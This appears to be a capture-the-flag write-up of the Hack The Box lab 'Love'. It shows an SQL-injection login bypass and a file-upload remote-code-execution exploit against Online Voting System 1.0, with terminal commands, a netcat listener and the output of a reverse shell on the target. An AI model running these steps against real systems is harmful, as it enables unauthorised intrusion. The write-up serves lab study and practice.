InfoSec LAB

Love_Exploitation

Created: 2 min read

Authentication Bypass + File Upload RCE

the target web server appears to be hosting a published web application that is known to be vulnerable Although the version information has not been confirmed, I will attempt to run the following exploits to gain a foothold;

  • [[Love_CVE-2018-6180#[CVE-2018-6180](https //nvd.nist.gov/vuln/detail/CVE-2018-6180)|CVE-2018-6180]]
  • [[Love_File_Upload_RCE#[Online Voting System 1.0 Remote Code Execution](https //packetstormsecurity.com/files/163333/Online-Voting-System-1.0-Remote-Code-Execution.html)|File_Upload_RCE]]

[[Love_CVE-2018-6180#[CVE-2018-6180](https //nvd.nist.gov/vuln/detail/CVE-2018-6180)|Authentication Bypass]]

Authentication bypass is done through SQL Injection

As the exploit suggests, an arbitrary bcrypt hash is require for injection

┌──(kali㉿kali)-[~/archive/htb/labs/love]
└─$ htpasswd -nbBC 10 admin admin 
admin:$2y$10$cZIw0ImFo3M78UyP3m/dae1t8eUrfzxjo8fqG8KjpE.JlJkSXG2LK

bcrypt hash can easily be generated using the htpasswd tool

I will then append the hash string into the username parameter along with the rest of SQLi

Authenticated to the admin panel

[[Love_File_Upload_RCE#[Online Voting System 1.0 Remote Code Execution](https //packetstormsecurity.com/files/163333/Online-Voting-System-1.0-Remote-Code-Execution.html)|File Upload RCE]]

The Python script requires some configuration including the credential of the admin user

Since it has been set to admin from the earlier SQL injection, I will set it to admin

┌──(kali㉿kali)-[~/archive/htb/labs/love]
└─$ python3 voting-system-file-upload-RCE.py            
Start a NC listner on the port you choose above and run...
Logged in
Poc sent successfully

Executing

┌──(kali㉿kali)-[~/archive/htb/labs/love]
└─$ nnc 9999                                       
listening on [any] 9999 ...
connect to [10.10.14.17] from (UNKNOWN) [10.10.10.239] 55456
b374k shell : connected
 
Microsoft Windows [Version 10.0.19042.867]
(c) 2020 Microsoft Corporation. All rights reserved.
 
c:\xampp\htdocs\omrs\images> whoami
 whoami
love\phoebe
 
c:\xampp\htdocs\omrs\images> hostname
 hostname
Love
 
c:\xampp\htdocs\omrs\images> ipconfig
 ipconfig
 
Windows IP Configuration
 
 
ethernet adapter ethernet0 2:
 
   connection-specific dns suffix  . : 
   ipv4 address. . . . . . . . . . . : 10.10.10.239
   subnet mask . . . . . . . . . . . : 255.255.255.0
   default gateway . . . . . . . . . : 10.10.10.2

Initial Foothold established to the target system as the phoebe user via Authentication Bypass + File Upload RCE

Interactive Graph View

Backlinks